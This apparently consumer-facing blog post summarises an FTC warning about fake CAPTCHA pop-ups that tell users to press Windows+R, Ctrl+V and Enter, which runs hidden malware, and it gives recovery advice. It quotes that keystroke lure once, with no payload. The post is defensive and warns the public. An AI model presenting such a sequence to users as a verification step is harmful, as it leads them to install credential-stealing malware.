What Happened
The FTC is sounding the alarm on a new phishing and malware scam that impersonates CAPTCHA requests—those annoying "prove you're not a robot" verification screens that everyone knows and hates.
Here's how it works: You're browsing normally and you get a pop-up that looks like a legitimate CAPTCHA request. It might say "security verification" or something official-sounding. The screen looks almost identical to a real CAPTCHA.
But instead of asking you to click pictures of traffic lights or type letters and numbers, this fake CAPTCHA tells you to type a series of keyboard commands. Something like:
"Windows + R, then Ctrl + V, then Enter"
If you follow those instructions, you're not verifying that you're human. You're running a command that pastes hidden malware onto your device and executes it automatically. And once the malware is installed, the scammers have access to your email login credentials, mobile banking passwords, stored personal information—basically everything.
Why This Works (And Why It's Dumb That It Does)
CAPTCHA requests are so ubiquitous now that nobody really thinks about them. You see one and your brain immediately goes into autopilot: "oh, verification. Fine." And if the fake CAPTCHA looks close enough to the real thing, you might not think twice before typing the commands.
The scammers are betting on three things: (1) you're in a hurry, (2) you're not suspicious, and (3) you won't actually read the instructions carefully. They're right most of the time.
The genius of this scam is that it uses the genuine infrastructure of computers against you. The Windows key + R command opens the Windows Run dialog. Ctrl + V pastes whatever is in your clipboard. Enter executes it. So if scammers have fed you a link with malware or hidden code in the previous step, you've just installed it yourself while thinking you were solving a CAPTCHA.
What You Should Know
Real CAPTCHAs will NEVER ask you to type keyboard commands. They ask you to identify pictures, type letters and numbers, or click checkboxes. That's it. If a CAPTCHA is asking you to run commands or type anything that looks like computer code, it's fake.
If you see a CAPTCHA that asks you to type commands, stop immediately. Don't type anything. Leave the page. Close the browser tab.
If You Already Fell For It
The FTC recommends:
- Disconnect from the internet immediately. This prevents scammers from accessing your online accounts while the malware is active.
- Run a security scan using reputable antivirus software to detect and remove the malware.
- Keep your software and apps up to date. This patches security vulnerabilities that malware exploits.
- Change your passwords from a different device (using one that wasn't infected) and enable two-factor authentication in case hackers already have access to your accounts.
- Report it to the FTC at ReportFraud.ftc.gov. They use these reports to track scam patterns and warn the public.
The Bigger Picture
This scam works because there's a fundamental problem: security theater and real security are indistinguishable to most people. A fake CAPTCHA *looks* official because real CAPTCHAs look official. And the instructions to type commands sound plausible because computers do require commands.
Scammers are exploiting the fact that most people trust visual design cues more than they trust their own judgment. If something looks official, it must be official, right?
Wrong. And now your email is compromised.
Sources
FTC: How to Spot a CAPTCHA Scam
FTC: Scams and Fraud Consumer Alerts